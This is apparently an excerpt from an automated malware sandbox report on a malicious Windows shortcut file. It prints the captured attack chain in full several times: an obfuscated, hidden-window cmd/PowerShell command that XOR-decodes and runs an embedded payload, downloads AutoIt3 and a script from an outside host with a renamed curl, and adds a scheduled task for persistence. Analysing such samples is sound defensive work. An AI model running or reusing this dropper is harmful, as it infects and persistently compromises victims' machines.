    Source: Binary string: curl.pdb source: GSlLzFnTov.exe, 00000008.00000000.1395554704.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000002.1453592808.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 00000009.00000000.1415716755.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000000.1460809196.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000C.00000002.1484133596.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000002.1503582036.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe, 0000000E.00000000.1484395249.00007FF700E9E000.00000002.00000001.01000000.00000007.sdmp, GSlLzFnTov.exe.1.dr
    Source: Binary string: .pdb8; source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: 089\System.Core.pdb source: powershell.exe, 00000006.00000002.1453411821.0000026329A40000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: *on.pdb source: powershell.exe, 00000006.00000002.1436302402.000002632961D000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    barindex
    Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sLkrGsZRCfGabaMfKpxFsSpWKAhNPssJmxQAcjvWqTWLATHZCqoATzGzvpHekkckNXPBjjczUAozVEuRUijweRQLSofNBqLfRLXEeePsnNHrmfESURkbbEfWgcLVepXBQiKiGQMPtRiqhxyLJoTMfJdkFbwbsToYRfAcvvjedvHjuQNHCakQwkvfexCFsKuzAkzcXvpndNHJbTQQnPxsGyzEJuYXSEMtbgHipKLgLYLJBMekHNsCkbUcLVtBxrvyboHVkGzBdrHJNRcWpModkhhZnExuqhJsAmGodjabnQyUtjpUSwmLcsnTfJGFifkVHphAiPSfLnRvJoFdoCBTWXpiYPhuBuTgECkdcPLdEfZQASjSdCqFCrZKZYBuGwCquJSecAazSxoQXzGfCprYdmCmEzedkpwhAJtSaeQ00001DA5xqwRqfFmhfEzAvXoBbfnogPfxyQunyxhuNGMPxfcWvkMuEofFAjcYWxrBrsSqjZJHwfNQjydVdrTVcKUkJQMoujxpojwfoMLwBeYyAqubggUEEvyGyGGumtmnGwzacYGrFvsYMuKsuKhnpUKTLRGHeqjhSKSdQtZhzBZidzVdXnaBmYYNNHpmrZmomjgbBFCaLZNMVAQjVBLRqGWTMdpheNRzqKXTtTzqKaSmkkTkTeqPouYEonoypuVXimvkCWQbbufpQJHzjepZvbmVLsEgEbapeUdYQHGWpoNUoJPFEPokeWzgZzzkqJwatRkVEJLBwsKhosFcCZBQMPjhtXYphvEFSNyxwTaVcMPMksSGUwHrgGnFGcAHKutaNdpAThEKYGNaZxWaeruKNnyjzTStrrkGrNYhdpPLTXszUmGhfABsaKmzEebZqksGvfJkyPXPBJSRUZqnmJnQQSGGzwCYoPuGEMePCuJrENQqTvGEPNNHXBRCxbKckZzPojmgVAKRaWkbbpPeRYizaNJbWzqALFfEnbcHjyKmdWGbrQAhnFknQaNzzjktkiftQFPanfUqnXwefHKgYhoetTQnnAhZopaVQnmLaAVgLVZ||goto&po^w^e^rs^he^l^l -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy^|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy^|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;^& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;&mkdir c:\GSlLzFnTov & attrib +h c:\GSlLzFnTov & cd /d c:\GSlLzFnTov & copy c:\windows\system32\curl.exe GSlLzFnTov.exe & GSlLzFnTov -k -o AutoIt3.exe https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey0 & GSlLzFnTov -k -o QwbpjvdmTA.au3 https://jethropc.com/wp-admin/css/temp/hurry/?rv=papago^&za=honey1 & sc^htas^ks /create /sc minute /mo 1 /tn "QwbpjvdmTA" /tr "c:\GSlLzFnTov\AutoIt3.exe c:\GSlLzFnTov\QwbpjvdmTA.au3"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden function JogMjclRPK(){$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;
    Source: C:\GSlLzFnTov\GSlLzFnTov.exeCode function: 8_2_00007FF7F1DB1D84 GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,GetSystemDirectoryA,LoadLibraryA,free,8_2_00007FF7F1DB1D84
    Source: GSlLzFnTov.exe.1.drStatic PE information: section name: _RDATA
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF7C13D0566 push esi; retf 3_2_00007FF7C13D0567

    Persistence and Installation Behavior

    barindex
    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
    Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
    Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exeJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: attrib.exe
    Source: C:\Windows\System32\cmd.exeFile created: C:\GSlLzFnTov\GSlLzFnTov.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function vzGyLDmQaW{$djLutZCNrS=pXufClQZMa;$rqZWEoTXlI=JogMjclRPK;$zPedYniBfy=$rqZWEoTXlI[0];$CvytSiJOHD=[System.IO.BinaryReader]::new([System.IO.File]::open($zPedYniBfy,[System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite,[System.IO.FileShare]::None));try{$CvytSiJOHD.BaseStream.Seek(0x00001DA5,[System.IO.SeekOrigin]::Begin);$fKLtldjopW=$CvytSiJOHD.ReadBytes(0x00006C00);}finally{$CvytSiJOHD.Close()};for($nJlRQzeAUM=0; $nJlRQzeAUM -lt $fKLtldjopW.count; $nJlRQzeAUM++) { $fKLtldjopW[$nJlRQzeAUM]=$fKLtldjopW[$nJlRQzeAUM] -bxor 0xD8 };[System.IO.File]::WriteAllBytes($djLutZCNrS,$fKLtldjopW);$oEefgawPUH='.\'+$djLutZCNrS;& $oEefgawPUH;return 'WbpvmJeASc'};$oEefgawPUH=vzGyLDmQaW;$WrKnPBwfdh=JogMjclRPK;remove-item -path $WrKnPBwfdh[1] -force;@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'Sa
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk;$zPedYniBfy=$zPedYniBfy|where-object{$_.length -eq 0x0002233E};$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;if($zPedYniBfy.length -eq 0){cd $env:TEMP;$zPedYniBfy=Get-ChildItem *.lnk;$zPedYniBfy=$zPedYniBfy|where-object {$_.length -eq 0x0002233E} ;$nJlRQzeAUMCXVjArUNw=$zPedYniBfy;$zPedYniBfy=$zPedYniBfy|Select-Object -ExpandProperty Name;}return @($zPedYniBfy, $nJlRQzeAUMCXVjArUNw)};function pXufClQZMa(){$djLutZCNrS=JogMjclRPK;$zPedYniBfy=$djLutZCNrS[0];$zPedYniBfy=$zPedYniBfy.substring(0,$zPedYniBfy.length-4);return $zPedYniBfy};function 